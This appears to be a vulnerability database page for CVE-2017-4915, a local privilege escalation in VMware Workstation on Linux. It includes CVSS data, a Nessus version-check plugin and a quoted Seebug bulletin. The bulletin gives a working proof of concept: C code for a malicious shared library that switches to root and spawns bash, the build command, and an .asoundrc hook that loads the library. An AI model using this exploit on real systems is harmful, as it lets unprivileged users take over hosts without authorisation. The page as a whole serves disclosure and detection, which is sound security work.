Vulnerabilities > CVE-2017-4915 - Incorrect Authorization vulnerability in VMWare Workstation Player and Workstation PRO

047910
CVSS 7.2 - HIGH
Attack vector
LOCAL
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
local
low complexity
vmware
linux
CWE-863
nessus
exploit available
metasploit
NVD
Published: 2017-05-22
Updated: 2019-10-03

Summary

VMware Workstation Pro/Player contains an insecure library loading vulnerability via ALSA sound driver configuration files. Successful exploitation of this issue may allow unprivileged host users to escalate their privileges to root in a Linux host machine.

Vulnerable Configurations

Part Description Count
Application
Vmware
2
OS
Linux
1

Common Weakness Enumeration (CWE)

Exploit-Db

  • idEDB-ID:47171
    last seen2019-07-26
    modified2018-12-30
    published2018-12-30
    reporterExploit-DB
    sourcehttps://www.exploit-db.com/download/47171
    titleVMware Workstation/Player < 12.5.5 - Local Privilege Escalation
  • descriptionVMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation. CVE-2017-4915. Local exploit for Linux platform. Tags: Local
    fileexploits/linux/local/42045.c
    idEDB-ID:42045
    last seen2017-05-22
    modified2017-05-22
    platformlinux
    port
    published2017-05-22
    reporterExploit-DB
    sourcehttps://www.exploit-db.com/download/42045/
    titleVMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation
    typelocal

Metasploit

descriptionThis module exploits a vulnerability in VMware Workstation Pro and Player on Linux which allows users to escalate their privileges by using an ALSA configuration file to load and execute a shared object as root when launching a virtual machine with an attached sound card. This module has been tested successfully on VMware Player version 12.5.0 on Debian Linux 8 Jessie.
idMSF:EXPLOIT/LINUX/LOCAL/VMWARE_ALSA_CONFIG
last seen2020-06-10
modified2019-11-03
published2017-06-18
references
reporterRapid7
sourcehttps://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/vmware_alsa_config.rb
titleVMware Workstation ALSA Config File Local Privilege Escalation

Nessus

NASL familyGeneral
NASL idVMWARE_WORKSTATION_LINUX_VMSA_2017_0009.NASL
descriptionThe version of VMware Workstation installed on the remote Linux host is 12.x prior to 12.5.6. It is, therefore, affected by a privilege escalation vulnerability in the ALSA sound driver due to insecurely loading shared libraries via the
last seen2020-06-01
modified2020-06-02
plugin id100417
published2017-05-25
reporterThis script is Copyright (C) 2017-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/100417
titleVMware Workstation 12.x < 12.5.6 Insecure Library Loading Privilege Escalation (VMSA-2017-0009) (Linux)
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(100417);
  script_version("1.6");
  script_cvs_date("Date: 2018/11/15 20:50:22");

  script_cve_id("CVE-2017-4915");
  script_bugtraq_id(98566);
  script_xref(name:"VMSA", value:"2017-0009");

  script_name(english:"VMware Workstation 12.x < 12.5.6 Insecure Library Loading Privilege Escalation (VMSA-2017-0009) (Linux)");
  script_summary(english:"Checks the VMware Workstation version.");

  script_set_attribute(attribute:"synopsis", value:
"A virtualization application installed on the remote Linux host is
affected by a privilege escalation vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of VMware Workstation installed on the remote Linux host
is 12.x prior to 12.5.6. It is, therefore, affected by a privilege
escalation vulnerability in the ALSA sound driver due to insecurely
loading shared libraries via the '.asoundrc' configuration file. A
local attacker can exploit this, by loading specially crafted
libraries, to gain root privileges on the host.");
  script_set_attribute(attribute:"see_also", value:"https://www.vmware.com/security/advisories/VMSA-2017-0009.html");
  script_set_attribute(attribute:"solution", value:
"Upgrade to VMware Workstation version 12.5.6 or later.");
  script_set_cvss_base_vector("CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:F/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'VMware Workstation ALSA Config File Local Privilege Escalation');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/05/18");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/05/18");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/05/25");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:vmware:workstation");
  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"General");

  script_copyright(english:"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.");

  script_dependencies("vmware_workstation_linux_installed.nbin");
  script_exclude_keys("SMB/Registry/Enumerated");
  script_require_keys("Host/VMware Workstation/Version", "Settings/ParanoidReport");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

if (get_kb_item("SMB/Registry/Enumerated")) audit(AUDIT_OS_NOT, "Linux", "Windows");

version = get_kb_item_or_exit("Host/VMware Workstation/Version");

fix = '';
if (version =~ "^12\.") fix = '12.5.6';

if (!empty(fix) && ver_compare(ver:version, fix:fix, strict:FALSE) < 0)
{
  report +=
    '\n  Installed version : ' + version +
    '\n  Fixed version     : ' + fix +
    '\n';
  security_report_v4(port:0, extra:report, severity:SECURITY_HOLE);
}
else audit(AUDIT_INST_VER_NOT_VULN, "VMware Workstation", version);

Packetstorm

Seebug

bulletinFamilyexploit
descriptionThis vulnerability permits an unprivileged user on a Linux machine on which VMWare Workstation is installed to gain root privileges. The issue is that, for VMs with audio, the privileged VM host process loads libasound, which parses ALSA configuration files, including one at ~/.asoundrc. libasound is not designed to run in a setuid context and deliberately permits loading arbitrary shared libraries via dlopen(). VMWare Workstation on Linux: unprivileged host user -> host root privesc via ALSA config CVE-2017-4915 This vulnerability permits an unprivileged user on a Linux machine on which VMWare Workstation is installed to gain root privileges. The issue is that, for VMs with audio, the privileged VM host process loads libasound, which parses ALSA configuration files, including one at ~/.asoundrc. libasound is not designed to run in a setuid context and deliberately permits loading arbitrary shared libraries via dlopen(). To reproduce, run the following commands on a normal Ubuntu desktop machine with VMWare Workstation installed: `~$ cd /tmp /tmp$ cat > evil_vmware_lib.c #define _GNU_SOURCE #include <stdlib.h> #include <string.h> #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <sys/prctl.h> #include <err.h> extern char *program_invocation_short_name; __attribute__((constructor)) void run(void) { if (strcmp(program_invocation_short_name, "vmware-vmx")) return; uid_t ruid, euid, suid; if (getresuid(&ruid, &euid, &suid)) err(1, "getresuid"); printf("current UIDs: %d %d %d\n", ruid, euid, suid); if (ruid == 0 || euid == 0 || suid == 0) { if (setresuid(0, 0, 0) || setresgid(0, 0, 0)) err(1, "setresxid"); printf("switched to root UID and GID"); system("/bin/bash"); _exit(0); } } /tmp$ gcc -shared -o evil_vmware_lib.so evil_vmware_lib.c -fPIC -Wall -ldl -std=gnu99 /tmp$ cat > ~/.asoundrc hook_func.pulse_load_if_running { lib "/tmp/evil_vmware_lib.so" func "conf_pulse_hook_load_if_running" } /tmp$ vmware Next, in the VMWare Workstation UI, open a VM with a virtual sound card and start it. Now, in the terminal, a root shell will appear: /tmp$ vmware current UIDs: 1000 1000 0 bash: cannot set terminal process group (13205): Inappropriate ioctl for device bash: no job control in this shell ~/vmware/Debian 8.x 64-bit# id uid=0(root) gid=0(root) groups=0(root),[...] ~/vmware/Debian 8.x 64-bit# ` I believe that the ideal way to fix this would be to run all code that doesn't require elevated privileges - like the code for sound card emulation - in an unprivileged process. However, for now, moving only the audio output handling into an unprivileged process might also do the job; I haven't yet checked whether there are more libraries VMWare Workstation loads that permit loading arbitrary libraries into the vmware-vmx process. Tested with version: 12.5.2 build-4638234, running on Ubuntu 14.04. This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public. Found by: jannh
idSSV:93133
last seen2017-11-19
modified2017-05-23
published2017-05-23
reporterRoot
titleVMWare Workstation On Linux Privilege Escalation

References